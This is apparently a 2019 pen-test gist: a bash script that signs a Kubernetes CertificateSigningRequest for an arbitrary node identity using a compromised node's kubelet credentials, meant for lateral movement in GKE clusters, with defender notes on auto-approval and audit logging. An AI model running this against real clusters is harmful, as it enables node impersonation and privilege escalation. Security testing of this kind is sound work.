Created
April 3, 2019 19:54
Quick script used during some exploratory GKE/k8s cluster pen-testing. The goal was to use a compromised node's kubelet credentials to move laterally through the cluster to other nodes and API objects.
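#!/bin/bash
#
# Pen-test helper (GKE/Kubernetes, written in 2019): checks whether a node's
# kubelet client credential can get a CertificateSigningRequest accepted for a
# node identity chosen by the operator.
#
# Steps:
#   1. generate a throwaway RSA key and a CSR with subject
#      O=system:nodes, CN=system:node:$NODE_NAME
#   2. wrap the CSR in a CertificateSigningRequest manifest
#   3. submit the manifest to the API server, authenticating with the
#      kubelet certificate and key
#   4. list CSRs so the operator can read the resulting status
# Nothing here retrieves or uses an issued certificate.
#
# Environment (all optional, defaults below):
#   NODE_NAME     node name placed in the CSR subject
#   KUBE_API      API server host
#   KUBELET_KEY   path to the kubelet client key
#   KUBELET_CERT  path to the kubelet client certificate
#
# Defender notes:
#   - A CSR from this script that ends up approved without a human approving
#     it means the cluster's approver accepts node-identity requests from this
#     credential. Review which subjects may create CSRs and which may have
#     them auto-approved (the nodeclient / selfnodeclient CSR permissions;
#     verify the exact bindings for your cluster version).
#   - API audit logs record who created each CSR; a CSR whose requested
#     CN differs from the requesting node's own identity is worth alerting on.
#   - NOTE(review): certificates.k8s.io/v1beta1 was removed in Kubernetes 1.22,
#     so this manifest reflects clusters of the script's era.

# -u and pipefail added so an unset variable or a failed pipeline stage stops
# the run instead of submitting a half-built manifest.
set -euo pipefail

NODE_NAME="${NODE_NAME:-random-node-name}"
KUBE_API="${KUBE_API:-35.226.10.2}"
KUBELET_KEY="${KUBELET_KEY:-/etc/srv/kubernetes/pki/kubelet.key}"
KUBELET_CERT="${KUBELET_CERT:-/etc/srv/kubernetes/pki/kubelet.crt}"

WORKDIR="$(mktemp -d /tmp/foo.XXXXX)"

# Remove the scratch directory on every exit path. The original only cleaned
# up on the last line, so any failure under `set -e` left the generated
# private key behind on the tested host.
cleanup() {
  rm -rf -- "${WORKDIR:?}"
}
trap cleanup EXIT

# Connection/authentication flags shared by both kubectl calls.
# NOTE(review): --insecure-skip-tls-verify disables verification of the API
# server's certificate, so the endpoint's identity is never checked. Where the
# cluster CA is available, --certificate-authority is the safer choice.
kubectl_args=(
  --insecure-skip-tls-verify
  --client-certificate "$KUBELET_CERT"
  --client-key "$KUBELET_KEY"
  --server "https://${KUBE_API}"
)

echo "==> Creating new key + CSR: $WORKDIR/k8shack.{key,csr}"
openssl req -nodes -newkey rsa:2048 \
  -keyout "$WORKDIR/k8shack.key" \
  -out "$WORKDIR/k8shack.csr" \
  -subj "/O=system:nodes/CN=system:node:${NODE_NAME}"

# Computed outside the here-doc so a failure is caught by `set -e`; a failing
# command substitution inside a here-doc would be silently ignored.
csr_b64="$(base64 <"$WORKDIR/k8shack.csr" | tr -d '\n')"
csr_suffix="$(date +%s)"

echo "==> Creating k8s CertificateSigningRequest yaml: $WORKDIR/k8shack-csr.yaml"
cat <<EOF >"$WORKDIR/k8shack-csr.yaml"
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
  name: node-csr-${NODE_NAME}-${csr_suffix}
spec:
  groups:
  - system:nodes
  request: ${csr_b64}
  usages:
  - digital signature
  - key encipherment
  - client auth
EOF

echo "==> Uploading CSR yaml to k8s api"
kubectl "${kubectl_args[@]}" create -f "$WORKDIR/k8shack-csr.yaml"

echo "==> Sleeping 3 seconds to give the API time to process the CSR... "
sleep 3

echo "==> Status of Pending CSR:"
kubectl "${kubectl_args[@]}" get certificatesigningrequests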